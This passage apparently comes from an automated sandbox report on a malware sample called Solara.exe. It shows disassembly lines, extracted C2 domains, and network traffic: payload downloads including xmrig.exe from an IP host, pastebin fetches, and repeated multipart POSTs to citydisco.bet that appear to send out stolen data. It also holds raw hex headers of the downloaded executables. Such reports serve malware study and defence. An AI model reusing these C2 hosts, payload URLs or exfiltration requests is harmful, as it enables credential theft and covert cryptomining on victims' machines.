                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h2_2_0044AE40
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then push edi2_2_00411E2A
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+0Ch]2_2_00420EA0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx ebp, byte ptr [esp+ecx-19B91E8Ah]2_2_00420EA0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CA198B66h2_2_00420EA0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+2Ch]2_2_00420EA0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 6D58C181h2_2_00420EA0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h2_2_00420EA0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-42h]2_2_0042F760
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh]2_2_0042F760
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then lea ebp, dword ptr [edx+ecx]2_2_0042F760
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then inc ebx2_2_00401040
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then mov dword ptr [esp], edx2_2_0044B840
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-58D31E9Ah]2_2_00431850
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then mov eax, ebx2_2_00424030
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then mov word ptr [eax], dx2_2_004208F5
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then jmp dword ptr [00451774h]2_2_0041F888
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then mov word ptr [eax], dx2_2_00420091
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-00000088h]2_2_004288A0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h2_2_004288A0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then mov word ptr [eax], cx2_2_004288A0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_0041312E
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then mov word ptr [ecx], si2_2_004201C3
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_0040A1E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_0040A1E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx eax, byte ptr [ecx+esi]2_2_0040B240
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+25E74604h]2_2_004112E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h2_2_0042031B
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+454B1CDCh]2_2_0040D3D0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then mov dword ptr [esi+04h], edx2_2_004113E2
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then push edi2_2_004313F7
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-099F648Ah]2_2_0042FB80
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movsx edx, byte ptr [esi+eax]2_2_0041AC10
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 8D94E5DFh2_2_0041ACD0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 53991D4Eh2_2_0041ACD0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-041B93BAh]2_2_0040C4E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then and esi, 80000000h2_2_0040BC80
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then push ebx2_2_0041FC88
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebx+10h]2_2_0040FCB0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then mov dword ptr [esp+18h], ecx2_2_0041D4B8
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]2_2_00444542
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_0043FD70
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]2_2_00446D30
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]2_2_00446D30
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]2_2_00446D30
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-00000092h]2_2_0042FDCC
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-5AE16A62h]2_2_004485D1
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh]2_2_0042ED90
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh]2_2_0042ED90
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+4E981752h]2_2_0041E5BB
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then mov byte ptr [edx], al2_2_00423612
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_004336C0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+08BA2EA8h]2_2_004236E0
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+25E74604h]2_2_004326FC
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_00437682
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx edi, byte ptr [eax+ecx+61250952h]2_2_00432E9E
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then push edi2_2_00431775
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx esi, byte ptr [edx]2_2_00431FCA
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]2_2_00402780
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+24h]2_2_0041EF9E
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax]2_2_0043F7B0
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_01554668

                  Networking

                  barindex
                  Source: Malware configuration extractorURLs: citydisco.bet/gdJIS
                  Source: Malware configuration extractorURLs: featureccus.shop/bdMAn
                  Source: Malware configuration extractorURLs: mrodularmall.top/aNzS
                  Source: Malware configuration extractorURLs: jowinjoinery.icu/bdWUa
                  Source: Malware configuration extractorURLs: legenassedk.top/bdpWO
                  Source: Malware configuration extractorURLs: htardwarehu.icu/Sbdsa
                  Source: Malware configuration extractorURLs: cjlaspcorne.icu/DbIps
                  Source: Malware configuration extractorURLs: bugildbett.top/bAuz
                  Source: unknownDNS query: name: pastebin.com
                  Source: global trafficTCP traffic: 192.168.2.8:64658 -> 1.1.1.1:53
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Mar 2025 13:22:28 GMTContent-Type: application/octet-streamContent-Length: 21504Last-Modified: Wed, 15 Jan 2025 19:13:16 GMTConnection: keep-aliveETag: "678808cc-5400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a 58 21 9a 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 48 00 00 00 0a 00 00 00 00 00 00 3a 66 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e7 65 00 00 4f 00 00 00 00 80 00 00 b8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 34 65 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 46 00 00 00 20 00 00 00 48 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 06 00 00 00 80 00 00 00 08 00 00 00 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 00 00 00 02 00 00 00 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 66 00 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 36 00 00 dc 2c 00 00 03 00 02 00 10 00 00 06 c4 63 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 b5 00 00 00 01 00 00 11 02 14 7d 1c 00 00 04 02 28 14 00 00 0a 00 00 02 28 06 00 00 06 00 28 05 00 00 06 00 28 03 00 00 06 00 02 28 0b 00 00 06 00 02 28 0a 00 00 06 00 7e 19 00 00 04 72 01 00 00 70 6f 15 00 00 0a 0a 06 2c 30 00 7e 03 00 00 04 7e 12 00 00 04 72 07 00 00 70 16 28 04 00 00 06 00 7e 0f 00 00 04 7e 12 00 00 04 72 23 00 00 70 16 28 04 00 00 06 00 00 2b 18 00 7e 02 00 00 04 7e 12 00 00 04 72 07 00 00 70 16 28 04 00 00 06 00 00 7e 01 00 00 04 7e 12 00 00 04 72 43 00 00 70 16 28 04 00 00 06 00 28 08 00 00 06 00 28 0c 00 00 06 00 02 28 0e 00 00 06 00 2a 00 00 00 13 30 03 00 21 00 00 00 02 00 00 11 00 02 28 16 00 00 0a 0a 06 25 6f 17 00 00 0a 20 80 00 00 00 60 6f 18 00 00 0a 00 06 0b 2b 00 07 2a 00 00 00 1b 30 04 00 a7 01 00 00 03 00 00 11 00 00 20 00 0f 00 00 28 19 00 00 0a 00 20 10 27 00 00 8d 31 00 00 01 0a 16 0b 16 0c 73 1a 00 00 0a 0d 09 7e 10 00 00 04 6f 1b 00 00 0a 13 04 11 04 73 1c 00 00 0a 13 05 00 06 16 72 5b
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Mar 2025 13:22:33 GMTContent-Type: application/octet-streamContent-Length: 8251392Last-Modified: Wed, 15 Jan 2025 19:13:17 GMTConnection: keep-aliveETag: "678808cd-7de800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 db 63 a2 64 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 10 5f 00 00 d8 7d 00 00 0c 32 00 d0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 b0 00 00 10 00 00 4c 7c 7e 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 ae 00 d8 46 00 00 00 40 af 00 e8 5c 00 00 00 10 76 00 9c ee 02 00 00 00 00 00 00 00 00 00 00 a0 af 00 6c 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 19 74 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c e0 ae 00 40 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 0a 5f 00 00 10 00 00 00 10 5f 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 60 04 01 00 00 20 5f 00 00 06 01 00 00 20 5f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 e0 dc 15 00 00 30 60 00 00 de 15 00 00 26 60 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 9c ee 02 00 00 10 76 00 00 f0 02 00 00 04 76 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 14 b9 03 00 00 00 79 00 00 ba 03 00 00 f4 78 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 e0 0a 32 00 00 c0 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 d8 46 00 00 00 d0 ae 00 00 48 00 00 00 ae 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 68 00 00 00 00 20 af 00 00 02 00 00 00 f6 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 30 af 00 00 02 00 00 00 f8 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 5c 00 00 00 40 af 00 e8 5c 00 00 00 fa 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 8e 00 00 00 a0 af 00 00 90 00 00 00 58 7d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Mar 2025 13:22:33 GMTContent-Type: application/octet-streamContent-Length: 14544Last-Modified: Wed, 15 Jan 2025 19:13:16 GMTConnection: keep-aliveETag: "678808cc-38d0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 35 3a 6e fc 71 5b 00 af 71 5b 00 af 71 5b 00 af 71 5b 01 af 7d 5b 00 af 56 9d 7b af 74 5b 00 af 56 9d 7d af 70 5b 00 af 56 9d 6d af 72 5b 00 af 56 9d 71 af 70 5b 00 af 56 9d 7c af 70 5b 00 af 56 9d 78 af 70 5b 00 af 52 69 63 68 71 5b 00 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 c1 26 8b 48 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 0c 00 00 00 0a 00 00 00 00 00 00 08 50 00 00 00 10 00 00 00 00 01 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 06 00 00 00 00 00 00 00 00 70 00 00 00 04 00 00 08 19 01 00 01 00 00 00 00 00 04 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 50 00 00 3c 00 00 00 00 60 00 00 c0 03 00 00 00 40 00 00 60 00 00 00 00 1a 00 00 d0 1e 00 00 00 00 00 00 00 00 00 00 70 20 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c6 06 00 00 00 10 00 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 7c 01 00 00 00 20 00 00 00 02 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 14 01 00 00 00 30 00 00 00 02 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 60 00 00 00 00 40 00 00 00 02 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 22 02 00 00 00 50 00 00 00 04 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e2 2e 72 73 72 63 00 00 00 c0 03 00 00 00 60 00 00 00 04 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: GET /raw/YpJeSRBC HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveHost: 185.215.113.51
                  Source: global trafficHTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /WinRing0x64.sys HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                  Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 185.215.113.51 185.215.113.51
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49684 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49682 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49686 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49693 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49692 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49690 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49691 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2829056 - Severity 2 - ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download : 192.168.2.8:49697 -> 185.215.113.51:80
                  Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 55Host: citydisco.bet
                  Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6m2667r5fsUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14485Host: citydisco.bet
                  Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8QKCff6wSl3pKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15046Host: citydisco.bet
                  Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AMzQ0rF90g5UT0wuUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20230Host: citydisco.bet
                  Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Kz43rOp8CpCh1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2474Host: citydisco.bet
                  Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2y0o3NwK2wtH7ogauUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570576Host: citydisco.bet
                  Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 93Host: citydisco.bet
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.51
